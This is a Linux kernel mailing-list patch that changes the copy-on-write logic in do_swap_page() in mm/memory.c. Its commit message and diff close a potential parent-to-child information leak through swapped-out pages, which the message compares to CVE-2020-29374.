From patchwork Fri Mar 25 01:13:40 2022 Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit X-Patchwork-Submitter: Andrew Morton X-Patchwork-Id: 12791202 Return-Path: X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on aws-us-west-2-korg-lkml-1.web.codeaurora.org Received: from kanga.kvack.org (kanga.kvack.org [205.233.56.17]) by smtp.lore.kernel.org (Postfix) with ESMTP id A8318C433F5 for ; Fri, 25 Mar 2022 01:13:43 +0000 (UTC) Received: by kanga.kvack.org (Postfix) id 2EE178D0047; Thu, 24 Mar 2022 21:13:43 -0400 (EDT) Received: by kanga.kvack.org (Postfix, from userid 40) id 275578D0005; Thu, 24 Mar 2022 21:13:43 -0400 (EDT) X-Delivered-To: int-list-linux-mm@kvack.org Received: by kanga.kvack.org (Postfix, from userid 63042) id 0EF648D0047; Thu, 24 Mar 2022 21:13:43 -0400 (EDT) X-Delivered-To: linux-mm@kvack.org Received: from relay.hostedemail.com (relay.hostedemail.com [64.99.140.27]) by kanga.kvack.org (Postfix) with ESMTP id ED46C8D0005 for ; Thu, 24 Mar 2022 21:13:42 -0400 (EDT) Received: from smtpin12.hostedemail.com (a10.router.float.18 [10.200.18.1]) by unirelay09.hostedemail.com (Postfix) with ESMTP id C477D2357A for ; Fri, 25 Mar 2022 01:13:42 +0000 (UTC) X-FDA: 79281136284.12.D903999 Received: from dfw.source.kernel.org (dfw.source.kernel.org [139.178.84.217]) by imf27.hostedemail.com (Postfix) with ESMTP id 4C93A40018 for ; Fri, 25 Mar 2022 01:13:42 +0000 (UTC) Received: from smtp.kernel.org (relay.kernel.org [52.25.139.140]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (No client certificate requested) by dfw.source.kernel.org (Postfix) with ESMTPS id B7A52618B8; Fri, 25 Mar 2022 01:13:41 +0000 (UTC) Received: by smtp.kernel.org (Postfix) with ESMTPSA id 16096C340EE; Fri, 25 Mar 2022 01:13:41 +0000 (UTC) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=linux-foundation.org; s=korg; t=1648170821; bh=mMrsxC879YTtVqjXQLPWUCdFOjPmdNVKwsa7pvDgE0A=; h=Date:To:From:In-Reply-To:Subject:From; b=FfHRtfvpeQWydNzNxJZV65CDffInUzK/LFcU2UaK0YCWav18N7oat8uTj9mk9YS/T PoC8cg9ezXXQZplS3ce1lFxZc36Ekwkyg1xyuy3IBSc4+FIoM9Et2w0lZod9rQc1B7 eoAy8fW/VRrBvJlAPjTPL+75l1/yESkeUcNTxtmk= Date: Thu, 24 Mar 2022 18:13:40 -0700 To: zhangliang5@huawei.com,willy@infradead.org,vbabka@suse.cz,shy828301@gmail.com,shakeelb@google.com,rppt@linux.ibm.com,roman.gushchin@linux.dev,rientjes@google.com,riel@surriel.com,peterx@redhat.com,oleg@redhat.com,nadav.amit@gmail.com,mike.kravetz@oracle.com,mhocko@kernel.org,kirill.shutemov@linux.intel.com,jhubbard@nvidia.com,jgg@nvidia.com,jannh@google.com,jack@suse.cz,hughd@google.com,hch@lst.de,ddutile@redhat.com,aarcange@redhat.com,david@redhat.com,akpm@linux-foundation.org,patches@lists.linux.dev,linux-mm@kvack.org,mm-commits@vger.kernel.org,torvalds@linux-foundation.org,akpm@linux-foundation.org From: Andrew Morton In-Reply-To: <20220324180758.96b1ac7e17675d6bc474485e@linux-foundation.org> Subject: [patch 102/114] mm: streamline COW logic in do_swap_page() Message-Id: <20220325011341.16096C340EE@smtp.kernel.org> X-Rspam-User: Authentication-Results: imf27.hostedemail.com; dkim=pass header.d=linux-foundation.org header.s=korg header.b=FfHRtfvp; spf=pass (imf27.hostedemail.com: domain of akpm@linux-foundation.org designates 139.178.84.217 as permitted sender) smtp.mailfrom=akpm@linux-foundation.org; dmarc=none X-Rspamd-Server: rspam03 X-Rspamd-Queue-Id: 4C93A40018 X-Stat-Signature: 3z55b9n1gx7oaj56u7jpnrkk7muapb6f X-HE-Tag: 1648170822-498863 X-Bogosity: Ham, tests=bogofilter, spamicity=0.000000, version=1.2.4 Sender: owner-linux-mm@kvack.org Precedence: bulk X-Loop: owner-majordomo@kvack.org List-ID: From: David Hildenbrand Subject: mm: streamline COW logic in do_swap_page() Currently we have a different COW logic when: * triggering a read-fault to swapin first and then trigger a write-fault -> do_swap_page() + do_wp_page() * triggering a write-fault to swapin -> do_swap_page() + do_wp_page() only if we fail reuse in do_swap_page() The COW logic in do_swap_page() is different than our reuse logic in do_wp_page(). The COW logic in do_wp_page() -- page_count() == 1 -- makes currently sure that we certainly don't have a remaining reference, e.g., via GUP, on the target page we want to reuse: if there is any unexpected reference, we have to copy to avoid information leaks. As do_swap_page() behaves differently, in environments with swap enabled we can currently have an unintended information leak from the parent to the child, similar as known from CVE-2020-29374: 1. Parent writes to anonymous page -> Page is mapped writable and modified 2. Page is swapped out -> Page is unmapped and replaced by swap entry 3. fork() -> Swap entries are copied to child 4. Child pins page R/O -> Page is mapped R/O into child 5. Child unmaps page -> Child still holds GUP reference 6. Parent writes to page -> Page is reused in do_swap_page() -> Child can observe changes Exchanging 2. and 3. should have the same effect. Let's apply the same COW logic as in do_wp_page(), conditionally trying to remove the page from the swapcache after freeing the swap entry, however, before actually mapping our page. We can change the order now that we use try_to_free_swap(), which doesn't care about the mapcount, instead of reuse_swap_page(). To handle references from the LRU pagevecs, conditionally drain the local LRU pagevecs when required, however, don't consider the page_count() when deciding whether to drain to keep it simple for now. Link: https://lkml.kernel.org/r/20220131162940.210846-5-david@redhat.com Signed-off-by: David Hildenbrand Acked-by: Vlastimil Babka Cc: Andrea Arcangeli Cc: Christoph Hellwig Cc: David Rientjes Cc: Don Dutile Cc: Hugh Dickins Cc: Jan Kara Cc: Jann Horn Cc: Jason Gunthorpe Cc: John Hubbard Cc: Kirill A. Shutemov Cc: Liang Zhang Cc: Matthew Wilcox (Oracle) Cc: Michal Hocko Cc: Mike Kravetz Cc: Mike Rapoport Cc: Nadav Amit Cc: Oleg Nesterov Cc: Peter Xu Cc: Rik van Riel Cc: Roman Gushchin Cc: Shakeel Butt Cc: Yang Shi Signed-off-by: Andrew Morton --- mm/memory.c | 55 +++++++++++++++++++++++++++++++++++++++----------- 1 file changed, 43 insertions(+), 12 deletions(-) --- a/mm/memory.c~mm-streamline-cow-logic-in-do_swap_page +++ a/mm/memory.c @@ -3489,6 +3489,25 @@ static vm_fault_t remove_device_exclusiv return 0; } +static inline bool should_try_to_free_swap(struct page *page, + struct vm_area_struct *vma, + unsigned int fault_flags) +{ + if (!PageSwapCache(page)) + return false; + if (mem_cgroup_swap_full(page) || (vma->vm_flags & VM_LOCKED) || + PageMlocked(page)) + return true; + /* + * If we want to map a page that's in the swapcache writable, we + * have to detect via the refcount if we're really the exclusive + * user. Try freeing the swapcache to get rid of the swapcache + * reference only in case it's likely that we'll be the exlusive user. + */ + return (fault_flags & FAULT_FLAG_WRITE) && !PageKsm(page) && + page_count(page) == 2; +} + /* * We enter with non-exclusive mmap_lock (to exclude vma changes, * but allow concurrent faults), and pte mapped but not yet locked. @@ -3630,6 +3649,16 @@ vm_fault_t do_swap_page(struct vm_fault page = swapcache; goto out_page; } + + /* + * If we want to map a page that's in the swapcache writable, we + * have to detect via the refcount if we're really the exclusive + * owner. Try removing the extra reference from the local LRU + * pagevecs if required. + */ + if ((vmf->flags & FAULT_FLAG_WRITE) && page == swapcache && + !PageKsm(page) && !PageLRU(page)) + lru_add_drain(); } cgroup_throttle_swaprate(page, GFP_KERNEL); @@ -3648,19 +3677,25 @@ vm_fault_t do_swap_page(struct vm_fault } /* - * The page isn't present yet, go ahead with the fault. - * - * Be careful about the sequence of operations here. - * To get its accounting right, reuse_swap_page() must be called - * while the page is counted on swap but not yet in mapcount i.e. - * before page_add_anon_rmap() and swap_free(); try_to_free_swap() - * must be called after the swap_free(), or it will never succeed. + * Remove the swap entry and conditionally try to free up the swapcache. + * We're already holding a reference on the page but haven't mapped it + * yet. */ + swap_free(entry); + if (should_try_to_free_swap(page, vma, vmf->flags)) + try_to_free_swap(page); inc_mm_counter_fast(vma->vm_mm, MM_ANONPAGES); dec_mm_counter_fast(vma->vm_mm, MM_SWAPENTS); pte = mk_pte(page, vma->vm_page_prot); - if ((vmf->flags & FAULT_FLAG_WRITE) && reuse_swap_page(page)) { + + /* + * Same logic as in do_wp_page(); however, optimize for fresh pages + * that are certainly not shared because we just allocated them without + * exposing them to the swapcache. + */ + if ((vmf->flags & FAULT_FLAG_WRITE) && !PageKsm(page) && + (page != swapcache || page_count(page) == 1)) { pte = maybe_mkwrite(pte_mkdirty(pte), vma); vmf->flags &= ~FAULT_FLAG_WRITE; ret |= VM_FAULT_WRITE; @@ -3686,10 +3721,6 @@ vm_fault_t do_swap_page(struct vm_fault set_pte_at(vma->vm_mm, vmf->address, vmf->pte, pte); arch_do_swap_page(vma->vm_mm, vma, vmf->address, pte, vmf->orig_pte); - swap_free(entry); - if (mem_cgroup_swap_full(page) || - (vma->vm_flags & VM_LOCKED) || PageMlocked(page)) - try_to_free_swap(page); unlock_page(page); if (page != swapcache && swapcache) { /*